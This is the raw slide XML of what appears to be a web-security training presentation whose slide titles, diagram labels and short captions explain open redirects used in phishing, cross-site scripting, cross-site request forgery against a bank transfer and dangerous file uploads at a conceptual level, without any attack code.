            <a:ext cx="825243" cy="3823"/>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699979" y="1113961"/>
            <a:ext cx="721008" cy="2339915"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -31706"/>
              <a:gd name="adj2" fmla="val 7084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1"/>
            <a:endCxn id="19" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2698393" y="4127910"/>
            <a:ext cx="1532049" cy="133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001873" y="4183641"/>
            <a:ext cx="1043619" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phishing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E-mail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Graphic 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0868551A-88CA-5C44-A00B-37F5392982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37" y="3595929"/>
            <a:ext cx="531981" cy="531981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62DC393D-D86F-E94E-B2A1-71CDE13F3BA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873496" y="1354399"/>
            <a:ext cx="5561825" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" dirty="0"/>
              <a:t>Sites that allow unrestricted redirects may be leveraged in phishing attacks. The users will trust the first part of the URL, but the site will betray their trust by redirecting to the evil page.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100769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urved Connector 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C997FDC-BF7F-2D43-9D94-DADC0687A70A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="1"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3121919" y="2851625"/>
            <a:ext cx="851348" cy="1600363"/>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228418" y="1512458"/>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232948" y="523351"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8D73A4-34F7-BB4F-A702-D68B3A75FFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3192325" y="1228465"/>
            <a:ext cx="1950840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.trusted.good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5852" y="445065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2310230" y="4268659"/>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956831" y="5403153"/>
            <a:ext cx="1050542" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>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4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4212781" y="3181332"/>
            <a:ext cx="1599027" cy="93961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F328B50-780E-0843-A476-174A2D6C54BB}"/>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50875" r="83807"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3973267" y="2496949"/>
            <a:ext cx="569219" cy="709353"/>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8" idx="1"/>
            <a:endCxn id="54" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1592178" y="2487669"/>
            <a:ext cx="718053" cy="2257240"/>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1742384" y="3515154"/>
            <a:ext cx="1050542" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Picture 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D214F5F5-9385-3342-8603-31907DBE72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232948" y="1561394"/>
            <a:ext cx="718457" cy="926275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="TextBox 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F76AE792-A9B2-5946-A45D-EE0E0BE3BA27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1224005"/>
            <a:ext cx="1507951" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.evil.bad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04641EE1-A7B0-3E40-9E9A-8D4DEC76DB5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384085" y="1224005"/>
            <a:ext cx="5329165" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="3600" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>When sites reflect user input as is, they allow attackers to insert malicious scripts and alter functionality.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147473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069219" y="1383243"/>
            <a:ext cx="1605449" cy="1950423"/>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176651" y="361428"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8D73A4-34F7-BB4F-A702-D68B3A75FFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921706" y="1038954"/>
            <a:ext cx="1950840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.trusted.good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6322" y="4321438"/>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151031" y="4139444"/>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386322" y="5233760"/>
            <a:ext cx="1050542" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Curved Connector 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56AD4CEB-26B0-0746-B537-EFE45C343400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="35" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="3143807" y="2602673"/>
            <a:ext cx="1962985" cy="1474546"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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3" t="-154" r="83694" b="49654"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2814741" y="1993850"/>
            <a:ext cx="573285" cy="729206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="Curved Connector 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54BFB6DF-C3EE-3545-BFE3-82D42039A13F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="19" idx="3"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2438970" y="4797688"/>
            <a:ext cx="1947352" cy="1336"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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3E3D49-ECEB-B84F-BA98-35B0F2D4E826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3149397" y="4431028"/>
            <a:ext cx="1050542" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$$$</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F72BEC85-774B-3347-B2BC-7565B568A649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2" cstate="screen">
            <a:alphaModFix amt="69000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5540358" y="1383240"/>
            <a:ext cx="1605449" cy="1950423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A564719A-1C4D-C042-8435-1D7D1D917F79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5540358" y="1068085"/>
            <a:ext cx="1950840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Curved Connector 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D3783DA-F065-D745-88CF-80E8E48CAF58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="35" idx="1"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1962721" y="2358452"/>
            <a:ext cx="852021" cy="1964321"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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F12ECAE-B3A7-D045-9F7F-C3B59C3FA083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="1"/>
            <a:endCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3674668" y="2358451"/>
            <a:ext cx="1865690" cy="3"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="50000"/>
                <a:alpha val="6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5308CD-0267-C64A-9687-466A758F4132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3823733" y="1959988"/>
            <a:ext cx="1950840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/transferMoney</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3876C272-348E-BF41-8F98-EEE41F607D82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7842384" y="1116687"/>
            <a:ext cx="3434638" cy="4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>Sites with sensitive requests such as a bank money transfer, must prevent such requests from being hidden within other sites where they will be inadvertently executed by unsuspecting visitors.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103593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be 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1172C724-7D07-B14A-89BC-78850957D25E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2804246" y="1536188"/>
            <a:ext cx="1300442" cy="1924642"/>
          </a:xfrm>
          <a:prstGeom prst="cub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38200" y="359534"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upload of Dangerous File</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8D73A4-34F7-BB4F-A702-D68B3A75FFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2530386" y="1182176"/>
            <a:ext cx="1950840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.file.server</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4242" y="4316493"/>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583179" y="4134499"/>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4045221" y="5250094"/>
            <a:ext cx="1050542" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Curved Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650E4836-B7A8-F74B-A87F-DB491B7EBA63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="1"/>
            <a:endCxn id="35" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3218530" y="2899589"/>
            <a:ext cx="875713" cy="1893155"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 126104"/>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640274FF-491E-9140-A9EA-E5F0EA7B72D3}"/>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67104" t="53205" r="16432" b="-2165"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3218529" y="2521181"/>
            <a:ext cx="619535" cy="756814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7DBFE9D-CC97-7A4D-B83A-33E68820F0E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206557" y="3516135"/>
            <a:ext cx="1137488" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious Web Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Graphic 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02E84624-11C3-934C-A438-3C57C77792E1}"/>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16250" t="49342" r="67319" b="229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3001343" y="1847106"/>
            <a:ext cx="510868" cy="644075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Curved Connector 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6F4AA0E-AED1-334D-AD3A-CF28E87A322D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="0"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="1547709" y="2680865"/>
            <a:ext cx="1965355" cy="941914"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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D149F53-C264-AA41-9725-BD5C4D468EB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1332955" y="2136405"/>
            <a:ext cx="1513165" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confidential Docs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42" name="Curved Connector 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E17861D-E57E-7E45-AA04-7C96B7117C7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="4"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779578" y="2661064"/>
            <a:ext cx="790914" cy="1655429"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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0CCDA086-16BD-664F-8724-43B5B3A56D88}"/>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4376183" y="2963824"/>
            <a:ext cx="232401" cy="292999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="Graphic 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB325088-1CBE-1845-9F83-5B69ACCC4E1E}"/>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4608584" y="3684801"/>
            <a:ext cx="232401" cy="292999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="Graphic 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
